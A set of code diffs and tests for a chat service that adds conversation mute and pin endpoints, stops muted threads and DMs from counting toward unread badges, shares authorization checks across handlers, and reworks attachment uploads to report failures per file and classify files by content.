+		"/api/v1/chat/spaces/"+proj.ID+"/threads", nil)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("list threads: expected 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	var resp chatTopicListResponse
+	if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil {
+		t.Fatalf("decode: %v", err)
+	}
+
+	var found *chatTopicEntry
+	for i := range resp.Threads {
+		if resp.Threads[i].ID == topicID {
+			found = &resp.Threads[i]
+		}
+	}
+	if found == nil {
+		t.Fatalf("topic %s missing from threads list", topicID)
+	}
+	if !found.Muted {
+		t.Error("threads list should report muted=true")
+	}
+	if !found.Pinned {
+		t.Error("threads list should report pinned=true")
+	}
+}
+
+func TestChatV2_DMList_ReportsMuted(t *testing.T) {
+	srv, _, wcs, _, _ := setupMutePinTest(t)
+	ctx := context.Background()
+
+	peerID := tid("dm-mute-peer")
+	dmKey := "dm:user:" + DevUserID + ":user:" + peerID
+	if err := wcs.UpsertDM(ctx, WebChatDM{
+		ConversationKey: dmKey,
+		ParticipantID:   DevUserID,
+		PeerID:          peerID,
+		PeerKind:        "user",
+		LastActivityAt:  time.Now().UTC(),
+	}); err != nil {
+		t.Fatalf("UpsertDM: %v", err)
+	}
+
+	rec := doRequest(t, srv, http.MethodPut,
+		"/api/v1/chat/conversations/"+dmKey+"/mute", map[string]bool{"muted": true})
+	if rec.Code != http.StatusOK {
+		t.Fatalf("mute DM: expected 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	rec = doRequest(t, srv, http.MethodGet, "/api/v1/chat/dms", nil)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("list DMs: expected 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	var resp chatDMListResponse
+	if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil {
+		t.Fatalf("decode: %v", err)
+	}
+	if len(resp.DMs) != 1 {
+		t.Fatalf("expected 1 DM, got %d", len(resp.DMs))
+	}
+	if !resp.DMs[0].Muted {
+		t.Error("DM list should report muted=true")
+	}
+}

--- a/pkg/hub/handlers_chat_mute_pin_test.go
+++ b/pkg/hub/handlers_chat_mute_pin_test.go
@@ -415,6 +415,65 @@ func TestChatV2_ThreadsList_ReportsMutedAndPinned(t *testing.T) {
 	}
 }
 
+// TestChatV2_SpacesList_MutedThreadIsNotCountedUnread covers the rollup the
+// rail renders as the space badge. The thread-level suppression is only half
+// the feature: a space whose every unread thread is muted must stop carrying a
+// number, or the parent keeps shouting about threads the user silenced.
+func TestChatV2_SpacesList_MutedThreadIsNotCountedUnread(t *testing.T) {
+	srv, _, wcs, proj, topicID := setupMutePinTest(t)
+	ctx := context.Background()
+
+	// Give the topic an unread message: activity the caller has never read.
+	if err := wcs.TouchTopicActivity(ctx, topicID, tid("space-unread-msg")); err != nil {
+		t.Fatalf("TouchTopicActivity: %v", err)
+	}
+
+	if got := spaceUnreadCount(t, srv, proj.ID); got != 1 {
+		t.Fatalf("unmuted unread thread: unreadCount = %d, want 1", got)
+	}
+
+	rec := doRequest(t, srv, http.MethodPut,
+		"/api/v1/chat/conversations/"+topicID+"/mute", map[string]bool{"muted": true})
+	if rec.Code != http.StatusOK {
+		t.Fatalf("mute: expected 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	if got := spaceUnreadCount(t, srv, proj.ID); got != 0 {
+		t.Errorf("muted unread thread: unreadCount = %d, want 0", got)
+	}
+
+	// Unmuting brings the badge back — the rollup reads the flag, it does not
+	// consume the unread state.
+	rec = doRequest(t, srv, http.MethodPut,
+		"/api/v1/chat/conversations/"+topicID+"/mute", map[string]bool{"muted": false})
+	if rec.Code != http.StatusOK {
+		t.Fatalf("unmute: expected 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+	if got := spaceUnreadCount(t, srv, proj.ID); got != 1 {
+		t.Errorf("unmuted again: unreadCount = %d, want 1", got)
+	}
+}
+
+// spaceUnreadCount reads one space's unread rollup from GET /chat/spaces.
+func spaceUnreadCount(t *testing.T, srv *Server, projectID string) int {
+	t.Helper()
+	rec := doRequest(t, srv, http.MethodGet, "/api/v1/chat/spaces", nil)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("list spaces: expected 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+	var resp chatSpacesResponse
+	if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil {
+		t.Fatalf("decode: %v", err)
+	}
+	for _, s := range resp.Spaces {
+		if s.ProjectID == projectID {
+			return s.UnreadCount
+		}
+	}
+	t.Fatalf("project %s missing from spaces list", projectID)
+	return 0
+}
+
 func TestChatV2_DMList_ReportsMuted(t *testing.T) {
 	srv, _, wcs, _, _ := setupMutePinTest(t)
 	ctx := context.Background()

--- a/pkg/hub/handlers_chat_user_prefs_test.go
+++ b/pkg/hub/handlers_chat_user_prefs_test.go
@@ -12,6 +12,8 @@
 // See the License for the specific language governing permissions and
 // limitations under the License.
 
+//go:build !no_sqlite
+
 package hub
 
 import (

--- a/pkg/hub/handlers_chat_user_prefs_test.go
+++ b/pkg/hub/handlers_chat_user_prefs_test.go
@@ -1,0 +1,76 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//	http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package hub
+
+import (
+	"database/sql"
+	"encoding/json"
+	"net/http"
+	"testing"
+)
+
+// A prefs GET has to answer in the same field names the PUT accepts. The rail
+// writes spaceSortMode / spaceOrder and then reads its own preferences back on
+// the next load; if the response were PascalCase the read would silently miss
+// every field and the custom space order would look unsaved (#1031).
+func TestChatV2_UserPrefs_ResponseUsesRequestFieldNames(t *testing.T) {
+	srv, _ := testServer(t)
+
+	db, err := sql.Open("sqlite3", ":memory:")
+	if err != nil {
+		t.Fatalf("open sqlite: %v", err)
+	}
+	defer func() { _ = db.Close() }()
+	wcs := NewWebChatStore(db, "sqlite3")
+	if err := wcs.Init(); err != nil {
+		t.Fatalf("Init: %v", err)
+	}
+	srv.SetWebChatStore(wcs)
+
+	order := `["proj-b","proj-a"]`
+	rec := doRequest(t, srv, http.MethodPut, "/api/v1/chat/user-prefs", map[string]string{
+		"spaceSortMode":  "custom",
+		"spaceOrder":     order,
+		"threadSortMode": "alpha",
+	})
+	if rec.Code != http.StatusOK {
+		t.Fatalf("PUT expected 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	rec = doRequest(t, srv, http.MethodGet, "/api/v1/chat/user-prefs", nil)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("GET expected 200, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	var payload map[string]any
+	if err := json.Unmarshal(rec.Body.Bytes(), &payload); err != nil {
+		t.Fatalf("decode: %v", err)
+	}
+	want := map[string]string{
+		"spaceSortMode":  "custom",
+		"spaceOrder":     order,
+		"threadSortMode": "alpha",
+	}
+	for key, value := range want {
+		got, ok := payload[key]
+		if !ok {
+			t.Errorf("response is missing %q: %s", key, rec.Body.String())
+			continue
+		}
+		if got != value {
+			t.Errorf("%s = %v, want %q", key, got, value)
+		}
+	}
+}

--- a/pkg/hub/handlers_chat_v2.go
+++ b/pkg/hub/handlers_chat_v2.go
@@ -2929,7 +2929,13 @@ func (s *Server) storeUploadedFile(
 
 	safeName, err := SanitizeFilename(fh.Filename)
 	if err != nil {
-		return attachmentUploadResult{}, rejectAttachment("invalid filename: %v", err)
+		// Passed through without a prefix. Every error this can return already
+		// names the problem — "invalid filename", or the refused extension —
+		// and the failure entry carries the filename beside it, so a wrapper
+		// only stacks two subjects on one line ("invalid filename: invalid
+		// filename"). Nothing here echoes the uploader's text: the two
+		// extension errors interpolate a key of our own blocklists (#1045).
+		return attachmentUploadResult{}, attachmentRejection{msg: err.Error()}
 	}
 
 	file, err := fh.Open()

--- a/pkg/hub/handlers_chat_v2.go
+++ b/pkg/hub/handlers_chat_v2.go
@@ -2965,7 +2965,11 @@ func (s *Server) storeUploadedFile(
 		// be written, so what is left is storage no one can list or delete.
 		// Aborting the batch on the first failure used to cap that at one blob
 		// per request; the per-file loop makes it ten (#1089).
-		_ = as.Delete(ctx, projectID, meta.ID)
+		if delErr := as.Delete(ctx, projectID, meta.ID); delErr != nil {
+			// The blob is orphaned after all. Say so: nothing else will.
+			s.messageLog.Error("Failed to delete orphaned attachment blob",
+				"project_id", projectID, "attachment", meta.ID, "error", delErr)
+		}
 		return attachmentUploadResult{}, fmt.Errorf("save attachment metadata: %w", err)
 	}
 

--- a/pkg/hub/handlers_chat_v2.go
+++ b/pkg/hub/handlers_chat_v2.go
@@ -135,6 +135,16 @@ func (s *Server) handleChatSpaces(w http.ResponseWriter, r *http.Request) {
 			}
 			for _, t := range topics {
 				rs, ok := readMap[t.ID]
+				// A muted thread is silent all the way up: it contributes
+				// nothing to the space badge, so muting every unread thread in
+				// a space clears the badge instead of leaving the space
+				// shouting about threads the user asked to be quiet (#1029).
+				// Mentions are covered by the same rule — the rail already
+				// hides the mention dot on a muted thread, and a rollup that
+				// disagreed with it would put two numbers on screen.
+				if ok && rs.Muted {
+					continue
+				}
 				if !ok || rs.LastReadMessageID == "" || (t.LastMessageID != "" && t.LastMessageID != rs.LastReadMessageID) {
 					if t.LastMessageID != "" {
 						unreadCount++
@@ -1569,10 +1579,15 @@ func (s *Server) writeConversationReadState(
 	writeJSON(w, http.StatusOK, resp)
 }
 
-// authorizeConversationAccess authorizes the caller for a conversation key,
-// applying the same rule the read path uses: a DM is readable by its
-// participants, a topic by anyone with read access to its project. It writes
-// the error response itself and returns false when access is refused.
+// authorizeConversationAccess authorizes the caller for a conversation key: a
+// DM is reachable by its participants, a topic by anyone with read access to
+// its project. It writes the error response itself and returns false when
+// access is refused.
+//
+// The read, mute and pin handlers all call this rather than each carrying a
+// copy. They have to agree — you should not be able to mute a conversation you
+// cannot read — and three copies of the same twenty lines agree only until
+// someone edits one of them.
 func (s *Server) authorizeConversationAccess(
 	w http.ResponseWriter, r *http.Request, wcs WebChatStore, key, userID string,
 ) bool {

--- a/pkg/hub/handlers_chat_v2.go
+++ b/pkg/hub/handlers_chat_v2.go
@@ -2960,6 +2960,12 @@ func (s *Server) storeUploadedFile(
 	meta.UploadedBy = userID
 
 	if err := wcs.CreateAttachment(ctx, meta); err != nil {
+		// The blob is already on disk and nothing will ever reach it again: the
+		// download path finds an attachment through the row that just failed to
+		// be written, so what is left is storage no one can list or delete.
+		// Aborting the batch on the first failure used to cap that at one blob
+		// per request; the per-file loop makes it ten (#1089).
+		_ = as.Delete(ctx, projectID, meta.ID)
 		return attachmentUploadResult{}, fmt.Errorf("save attachment metadata: %w", err)
 	}
 

--- a/pkg/hub/handlers_chat_v2.go
+++ b/pkg/hub/handlers_chat_v2.go
@@ -1488,31 +1488,9 @@ func (s *Server) handleConversationRead(w http.ResponseWriter, r *http.Request, 
 		return
 	}
 
-	// Authorize.
 	isDM := strings.HasPrefix(key, "dm:")
-	if isDM {
-		if !validDMKey(key) {
-			BadRequest(w, "invalid DM key format")
-			return
-		}
-		if !isDMParticipant(key, user.ID()) {
-			Forbidden(w)
-			return
-		}
-	} else {
-		topic, err := wcs.GetTopic(ctx, key)
-		if err != nil || topic == nil {
-			NotFound(w, "Thread")
-			return
-		}
-		project, err := s.store.GetProject(ctx, topic.ProjectID)
-		if err != nil {
-			NotFound(w, "Project")
-			return
-		}
-		if !s.authorize(w, r, projectResource(project), ActionRead) {
-			return
-		}
+	if !s.authorizeConversationAccess(w, r, wcs, key, user.ID()) {
+		return
 	}
 
 	if r.Method == http.MethodGet {

--- a/pkg/hub/handlers_chat_v2.go
+++ b/pkg/hub/handlers_chat_v2.go
@@ -47,9 +47,11 @@ package hub
 import (
 	"context"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"io"
 	"log/slog"
+	"mime/multipart"
 	"net/http"
 	"regexp"
 	"slices"
@@ -2855,68 +2857,126 @@ func (s *Server) handleAttachmentUpload(w http.ResponseWriter, r *http.Request) 
 		return
 	}
 
-	var results []attachmentUploadResult
+	// One bad file in a selection of ten used to lose the other nine. Each file
+	// now succeeds or fails on its own and the response reports both, so the
+	// composer can keep what worked and name what did not.
+	results := make([]attachmentUploadResult, 0, len(files))
+	failures := make([]attachmentUploadFailure, 0)
+	internalError := false
 	for _, fh := range files {
-		// Validate size.
-		if fh.Size > MaxAttachmentSize {
-			ValidationError(w, fmt.Sprintf("file %q exceeds maximum size of %d bytes", fh.Filename, MaxAttachmentSize), nil)
-			return
-		}
-
-		// Sanitize filename.
-		safeName, err := SanitizeFilename(fh.Filename)
+		result, err := s.storeUploadedFile(ctx, as, wcs, projectID, user.ID(), fh)
 		if err != nil {
-			ValidationError(w, fmt.Sprintf("invalid filename %q: %v", fh.Filename, err), nil)
-			return
+			var rejection attachmentRejection
+			if !errors.As(err, &rejection) {
+				internalError = true
+				s.messageLog.Error("Attachment upload failed", "file", fh.Filename, "error", err)
+			}
+			failures = append(failures, attachmentUploadFailure{
+				Name:  fh.Filename,
+				Error: uploadFailureMessage(err),
+			})
+			continue
 		}
-
-		// Validate MIME type.
-		mime := fh.Header.Get("Content-Type")
-		// Normalize: strip parameters (e.g. "text/plain; charset=utf-8" -> "text/plain").
-		if idx := strings.Index(mime, ";"); idx >= 0 {
-			mime = strings.TrimSpace(mime[:idx])
-		}
-		if !AllowedMimeTypes[mime] {
-			ValidationError(w, fmt.Sprintf("file type %q not allowed", mime), nil)
-			return
-		}
-
-		// Open the file.
-		file, err := fh.Open()
-		if err != nil {
-			writeError(w, http.StatusInternalServerError, "INTERNAL", "failed to read uploaded file", nil)
-			return
-		}
-
-		// Save to storage.
-		meta, err := as.Save(ctx, projectID, safeName, file, fh.Size, mime)
-		_ = file.Close()
-		if err != nil {
-			writeError(w, http.StatusInternalServerError, "INTERNAL", fmt.Sprintf("failed to save file: %v", err), nil)
-			return
-		}
-
-		// Set the uploader.
-		meta.UploadedBy = user.ID()
-
-		// Persist metadata in DB.
-		if err := wcs.CreateAttachment(ctx, meta); err != nil {
-			writeError(w, http.StatusInternalServerError, "INTERNAL", "failed to save attachment metadata", nil)
-			return
-		}
-
-		results = append(results, attachmentUploadResult{
-			ID:       meta.ID,
-			Name:     meta.Filename,
-			MimeType: meta.MimeType,
-			Size:     meta.Size,
-			URL:      "/api/v1/chat/attachments/" + meta.ID,
-		})
+		results = append(results, result)
 	}
 
-	writeJSON(w, http.StatusCreated, map[string]interface{}{
+	// 201 whenever something was created, even alongside failures: the
+	// response body is where per-file outcomes live, and a client that got
+	// attachments back has to treat the request as having created them.
+	// Nothing created means nothing to report as created — 400 for a batch the
+	// caller can fix, 500 if the batch died on our side. 207 Multi-Status was
+	// the other candidate and was passed over: it is a WebDAV code that
+	// browsers and fetch wrappers treat as an oddity, for no gain over reading
+	// the body that has to be read anyway.
+	status := http.StatusCreated
+	if len(results) == 0 {
+		status = http.StatusBadRequest
+		if internalError {
+			status = http.StatusInternalServerError
+		}
+	}
+
+	writeJSON(w, status, map[string]interface{}{
 		"attachments": results,
+		"failures":    failures,
 	})
+}
+
+// attachmentRejection is a refusal the uploader caused and could fix — a
+// blocked extension, an unreadable type, an oversized file. Anything else is
+// ours and is reported as an internal error instead.
+type attachmentRejection struct{ msg string }
+
+func (e attachmentRejection) Error() string { return e.msg }
+
+func rejectAttachment(format string, args ...interface{}) error {
+	return attachmentRejection{msg: fmt.Sprintf(format, args...)}
+}
+
+// uploadFailureMessage renders a per-file failure for the composer. Rejections
+// speak for themselves; internal failures are logged in full and summarised
+// here, since their detail is about our storage, not the user's file.
+func uploadFailureMessage(err error) string {
+	var rejection attachmentRejection
+	if errors.As(err, &rejection) {
+		return rejection.msg
+	}
+	return "upload failed"
+}
+
+// storeUploadedFile validates, classifies, and stores one uploaded file.
+func (s *Server) storeUploadedFile(
+	ctx context.Context, as AttachmentStore, wcs WebChatStore,
+	projectID, userID string, fh *multipart.FileHeader,
+) (attachmentUploadResult, error) {
+	if fh.Size > MaxAttachmentSize {
+		return attachmentUploadResult{}, rejectAttachment(
+			"file exceeds the maximum size of %d bytes", MaxAttachmentSize)
+	}
+
+	safeName, err := SanitizeFilename(fh.Filename)
+	if err != nil {
+		return attachmentUploadResult{}, rejectAttachment("invalid filename: %v", err)
+	}
+
+	file, err := fh.Open()
+	if err != nil {
+		return attachmentUploadResult{}, fmt.Errorf("open uploaded file: %w", err)
+	}
+	defer func() { _ = file.Close() }()
+
+	// Classify from the content, not from the Content-Type the client put on
+	// the part: that header is a claim the uploader controls.
+	head := make([]byte, contentSniffLen)
+	n, err := io.ReadFull(file, head)
+	if err != nil && !errors.Is(err, io.EOF) && !errors.Is(err, io.ErrUnexpectedEOF) {
+		return attachmentUploadResult{}, fmt.Errorf("read uploaded file: %w", err)
+	}
+	mimeType, err := ClassifyAttachment(safeName, head[:n])
+	if err != nil {
+		return attachmentUploadResult{}, attachmentRejection{msg: err.Error()}
+	}
+	if _, err := file.Seek(0, io.SeekStart); err != nil {
+		return attachmentUploadResult{}, fmt.Errorf("rewind uploaded file: %w", err)
+	}
+
+	meta, err := as.Save(ctx, projectID, safeName, file, fh.Size, mimeType)
+	if err != nil {
+		return attachmentUploadResult{}, fmt.Errorf("save file: %w", err)
+	}
+	meta.UploadedBy = userID
+
+	if err := wcs.CreateAttachment(ctx, meta); err != nil {
+		return attachmentUploadResult{}, fmt.Errorf("save attachment metadata: %w", err)
+	}
+
+	return attachmentUploadResult{
+		ID:       meta.ID,
+		Name:     meta.Filename,
+		MimeType: meta.MimeType,
+		Size:     meta.Size,
+		URL:      "/api/v1/chat/attachments/" + meta.ID,
+	}, nil
 }
 
 // handleAttachmentDownload handles GET /api/v1/chat/attachments/{id}.
@@ -2993,6 +3053,13 @@ func (s *Server) handleAttachmentDownload(w http.ResponseWriter, r *http.Request
 
 	w.WriteHeader(http.StatusOK)
 	_, _ = io.Copy(w, reader)
+}
+
+// attachmentUploadFailure is one file the batch could not take, named so the
+// composer can say which of the dropped files did not make it and why.
+type attachmentUploadFailure struct {
+	Name  string `json:"name"`
+	Error string `json:"error"`
 }
 
 type attachmentUploadResult struct {

--- a/pkg/hub/handlers_chat_v2.go
+++ b/pkg/hub/handlers_chat_v2.go
@@ -229,6 +229,10 @@ func (s *Server) handleChatConversationRoutes(w http.ResponseWriter, r *http.Req
 		s.handleConversationTyping(w, r, key)
 	case "interagent":
 		s.handleConversationInteragent(w, r, key)
+	case "mute":
+		s.handleConversationMute(w, r, key)
+	case "pin":
+		s.handleConversationPin(w, r, key)
 	default:
 		http.NotFound(w, r)
 	}
@@ -1563,6 +1567,136 @@ func (s *Server) writeConversationReadState(
 	writeJSON(w, http.StatusOK, resp)
 }
 
+// authorizeConversationAccess authorizes the caller for a conversation key,
+// applying the same rule the read path uses: a DM is readable by its
+// participants, a topic by anyone with read access to its project. It writes
+// the error response itself and returns false when access is refused.
+func (s *Server) authorizeConversationAccess(
+	w http.ResponseWriter, r *http.Request, wcs WebChatStore, key, userID string,
+) bool {
+	if strings.HasPrefix(key, "dm:") {
+		if !validDMKey(key) {
+			BadRequest(w, "invalid DM key format")
+			return false
+		}
+		if !isDMParticipant(key, userID) {
+			Forbidden(w)
+			return false
+		}
+		return true
+	}
+
+	ctx := r.Context()
+	topic, err := wcs.GetTopic(ctx, key)
+	if err != nil || topic == nil {
+		NotFound(w, "Thread")
+		return false
+	}
+	project, err := s.store.GetProject(ctx, topic.ProjectID)
+	if err != nil {
+		NotFound(w, "Project")
+		return false
+	}
+	return s.authorize(w, r, projectResource(project), ActionRead)
+}
+
+// handleConversationMute handles PUT /api/v1/chat/conversations/{key}/mute.
+// Body: {"muted": bool}. A muted conversation raises no notifications
+// (ChatNotifier already honours the flag) and shows no unread badge.
+func (s *Server) handleConversationMute(w http.ResponseWriter, r *http.Request, key string) {
+	if r.Method != http.MethodPut {
+		MethodNotAllowed(w)
+		return
+	}
+
+	user := GetUserIdentityFromContext(r.Context())
+	if user == nil {
+		Forbidden(w)
+		return
+	}
+
+	s.mu.RLock()
+	wcs := s.webChatStore
+	s.mu.RUnlock()
+
+	if wcs == nil {
+		writeError(w, http.StatusServiceUnavailable, "SERVICE_UNAVAILABLE", "Chat not available", nil)
+		return
+	}
+
+	if !s.authorizeConversationAccess(w, r, wcs, key, user.ID()) {
+		return
+	}
+
+	r.Body = http.MaxBytesReader(w, r.Body, 1048576)
+	var body struct {
+		Muted *bool `json:"muted"`
+	}
+	if err := json.NewDecoder(r.Body).Decode(&body); err != nil {
+		BadRequest(w, "invalid request body")
+		return
+	}
+	if body.Muted == nil {
+		ValidationError(w, "muted is required", nil)
+		return
+	}
+
+	if err := wcs.SetMuted(r.Context(), user.ID(), key, *body.Muted); err != nil {
+		writeError(w, http.StatusInternalServerError, "INTERNAL", "failed to update mute state", nil)
+		return
+	}
+
+	writeJSON(w, http.StatusOK, map[string]bool{"muted": *body.Muted})
+}
+
+// handleConversationPin handles PUT /api/v1/chat/conversations/{key}/pin.
+// Body: {"pinned": bool}. Pinned threads sort above the rest of their space.
+func (s *Server) handleConversationPin(w http.ResponseWriter, r *http.Request, key string) {
+	if r.Method != http.MethodPut {
+		MethodNotAllowed(w)
+		return
+	}
+
+	user := GetUserIdentityFromContext(r.Context())
+	if user == nil {
+		Forbidden(w)
+		return
+	}
+
+	s.mu.RLock()
+	wcs := s.webChatStore
+	s.mu.RUnlock()
+
+	if wcs == nil {
+		writeError(w, http.StatusServiceUnavailable, "SERVICE_UNAVAILABLE", "Chat not available", nil)
+		return
+	}
+
+	if !s.authorizeConversationAccess(w, r, wcs, key, user.ID()) {
+		return
+	}
+
+	r.Body = http.MaxBytesReader(w, r.Body, 1048576)
+	var body struct {
+		Pinned *bool `json:"pinned"`
+	}
+	if err := json.NewDecoder(r.Body).Decode(&body); err != nil {
+		BadRequest(w, "invalid request body")
+		return
+	}
+	if body.Pinned == nil {
+		ValidationError(w, "pinned is required", nil)
+		return
+	}
+
+	if err := wcs.SetPinned(r.Context(), user.ID(), key, *body.Pinned); err != nil {
+		writeError(w, http.StatusInternalServerError, "INTERNAL", "failed to update pin state", nil)
+		return
+	}
+
+	writeJSON(w, http.StatusOK, map[string]bool{"pinned": *body.Pinned})
+}
+
 // handleSpaceRead handles POST /api/v1/chat/spaces/{projectId}/read.
 func (s *Server) handleSpaceRead(w http.ResponseWriter, r *http.Request, projectID string) {
 	if r.Method != http.MethodPost {
@@ -1674,6 +1808,7 @@ func (s *Server) handleChatDMs(w http.ResponseWriter, r *http.Request) {
 		rs, _ := wcs.GetReadState(ctx, user.ID(), dm.ConversationKey)
 		if rs != nil {
 			entry.LastReadMessageID = rs.LastReadMessageID
+			entry.Muted = rs.Muted
 			entry.HasUnread = dm.LastMessageID != "" && dm.LastMessageID != rs.LastReadMessageID
 		} else {
 			entry.HasUnread = dm.LastMessageID != ""
@@ -2584,6 +2719,7 @@ type chatDMEntry struct {
 	LastActivityAt     time.Time `json:"lastActivityAt"`
 	LastReadMessageID  string    `json:"lastReadMessageId,omitempty"`
 	HasUnread          bool      `json:"hasUnread"`
+	Muted              bool      `json:"muted"`
 	LastMessagePreview string    `json:"lastMessagePreview,omitempty"`
 	LastMessageSender  string    `json:"lastMessageSender,omitempty"`
 }

--- a/pkg/hub/webchannel_store.go
+++ b/pkg/hub/webchannel_store.go
@@ -237,11 +237,14 @@ type WebChatReadState struct {
 }
 
 // WebChatUserPrefs holds per-user rail preferences.
+// The json tags mirror the field names PUT /api/v1/chat/user-prefs accepts, so
+// a client can read back what it wrote instead of translating between a
+// camelCase request and a PascalCase response.
 type WebChatUserPrefs struct {
-	UserID         string
-	SpaceSortMode  string // "activity", "alpha", "custom"
-	SpaceOrder     string // JSON array of project UUIDs
-	ThreadSortMode string // "activity", "alpha"
+	UserID         string `json:"userId"`
+	SpaceSortMode  string `json:"spaceSortMode"`  // "activity", "alpha", "custom"
+	SpaceOrder     string `json:"spaceOrder"`     // JSON array of project UUIDs
+	ThreadSortMode string `json:"threadSortMode"` // "activity", "alpha"
 }
 
 // WebChatDM represents one side of a DM conversation.

--- a/web/src/components/pages/chat.test.ts
+++ b/web/src/components/pages/chat.test.ts
@@ -420,6 +420,21 @@ describe('chat page — DM mute toggle', () => {
     expect(el.v2Conversation.muted).toBe(false);
   });
 
+  it('does not reconcile onto a DM the user switched to mid-request', async () => {
+    const el = pageOnDM(false);
+    // The server disagrees with the optimistic value, so the success path wants
+    // to write back — but by the time it resolves the user is reading another DM.
+    vi.mocked(apiFetch).mockImplementation(async () => {
+      el.v2Conversation = { ...el.v2Conversation, conversationKey: 'dm:user-me:user-2' };
+      return new Response(JSON.stringify({ muted: false }), { status: 200 });
+    });
+
+    await el.toggleDMMute();
+
+    expect(el.v2Conversation.conversationKey).toBe('dm:user-me:user-2');
+    expect(el.v2Conversation.muted).toBe(true);
+  });
+
   it('renders the bell as filled-through only while muted', () => {
     const quiet = renderToFragment(pageOnDM(true).renderDMMuteButton(pageOnDM(true).v2Conversation));
     expect(quiet.querySelector('.dm-mute')?.getAttribute('name')).toBe('bell-slash');

--- a/web/src/components/pages/chat.test.ts
+++ b/web/src/components/pages/chat.test.ts
@@ -363,3 +363,68 @@ describe('chat page — mobile swipe navigation', () => {
     expect(el.mobilePanel).toBe('center');
   });
 });
+
+describe('chat page — DM mute toggle', () => {
+  /** A page with an open DM conversation in the given muted state. */
+  function pageOnDM(muted: boolean): any {
+    const el = createPage();
+    el.v2Conversation = {
+      conversationKey: 'dm:user-me:user-1',
+      projectId: 'proj-1',
+      threadName: '',
+      peerName: 'Ada Lovelace',
+      peerId: 'user-1',
+      peerKind: 'user',
+      isDM: true,
+      muted,
+    };
+    return el;
+  }
+
+  it('PUTs the mute endpoint for the open DM and flips the local state', async () => {
+    const el = pageOnDM(false);
+    vi.mocked(apiFetch).mockResolvedValue(
+      new Response(JSON.stringify({ muted: true }), { status: 200 })
+    );
+
+    await el.toggleDMMute();
+
+    expect(apiFetch).toHaveBeenCalledWith(
+      '/api/v1/chat/conversations/dm%3Auser-me%3Auser-1/mute',
+      expect.objectContaining({ method: 'PUT', body: JSON.stringify({ muted: true }) })
+    );
+    expect(el.v2Conversation.muted).toBe(true);
+  });
+
+  it('unmutes a muted DM', async () => {
+    const el = pageOnDM(true);
+    vi.mocked(apiFetch).mockResolvedValue(
+      new Response(JSON.stringify({ muted: false }), { status: 200 })
+    );
+
+    await el.toggleDMMute();
+
+    expect(apiFetch).toHaveBeenCalledWith(
+      expect.stringContaining('/mute'),
+      expect.objectContaining({ body: JSON.stringify({ muted: false }) })
+    );
+    expect(el.v2Conversation.muted).toBe(false);
+  });
+
+  it('rolls back when the server refuses', async () => {
+    const el = pageOnDM(false);
+    vi.mocked(apiFetch).mockResolvedValue(new Response('{}', { status: 403 }));
+
+    await el.toggleDMMute();
+
+    expect(el.v2Conversation.muted).toBe(false);
+  });
+
+  it('renders the bell as filled-through only while muted', () => {
+    const quiet = renderToFragment(pageOnDM(true).renderDMMuteButton(pageOnDM(true).v2Conversation));
+    expect(quiet.querySelector('.dm-mute')?.getAttribute('name')).toBe('bell-slash');
+
+    const loud = renderToFragment(pageOnDM(false).renderDMMuteButton(pageOnDM(false).v2Conversation));
+    expect(loud.querySelector('.dm-mute')?.getAttribute('name')).toBe('bell');
+  });
+});

--- a/web/src/components/pages/chat.test.ts
+++ b/web/src/components/pages/chat.test.ts
@@ -428,3 +428,46 @@ describe('chat page — DM mute toggle', () => {
     expect(loud.querySelector('.dm-mute')?.getAttribute('name')).toBe('bell');
   });
 });
+
+describe('chat page — muted DMs raise no unread dot', () => {
+  /** Answer GET /api/v1/chat/dms with the given entries. */
+  function serveDMs(dms: Array<Record<string, unknown>>): void {
+    vi.mocked(apiFetch).mockImplementation((url: string) => {
+      if (url.startsWith('/api/v1/chat/dms')) {
+        return Promise.resolve(new Response(JSON.stringify({ dms }), { status: 200 }));
+      }
+      return Promise.resolve(new Response('{}', { status: 200 }));
+    });
+  }
+
+  it('leaves a muted DM out of the unread peers', async () => {
+    const el = createPage();
+    serveDMs([
+      { peerId: 'user-1', hasUnread: true, muted: true },
+      { peerId: 'user-2', hasUnread: true, muted: false },
+    ]);
+
+    await el.loadUnreadDMPeers();
+
+    expect(el.v2UnreadFromIds).toEqual(['user-2']);
+  });
+
+  it('keeps unmuted unread DMs when muted is absent from the payload', async () => {
+    const el = createPage();
+    serveDMs([{ peerId: 'user-1', hasUnread: true }]);
+
+    await el.loadUnreadDMPeers();
+
+    expect(el.v2UnreadFromIds).toEqual(['user-1']);
+  });
+
+  it('drops every dot when the only unread DMs are muted', async () => {
+    const el = createPage();
+    el.v2UnreadFromIds = ['user-1'];
+    serveDMs([{ peerId: 'user-1', hasUnread: true, muted: true }]);
+
+    await el.loadUnreadDMPeers();
+
+    expect(el.v2UnreadFromIds).toEqual([]);
+  });
+});

--- a/web/src/components/pages/chat.ts
+++ b/web/src/components/pages/chat.ts
@@ -174,6 +174,11 @@ interface V2ConversationState {
   peerName: string;
   peerId: string;
   peerKind: 'user' | 'agent';
+  /**
+   * Muted state of this conversation for the current user. Resolved from the
+   * DM list; a DM that does not exist yet is unmuted.
+   */
+  muted?: boolean;
 }
 
 /** The parts of a thread that a URL does not carry and have to be resolved. */
@@ -1576,6 +1581,7 @@ export class ScionPageChat extends LitElement {
           peerId: string;
           peerKind: 'user' | 'agent';
           peerSlug?: string;
+          muted?: boolean;
         }>;
       };
       const dm = data.dms?.find((d) => d.conversationKey === key);
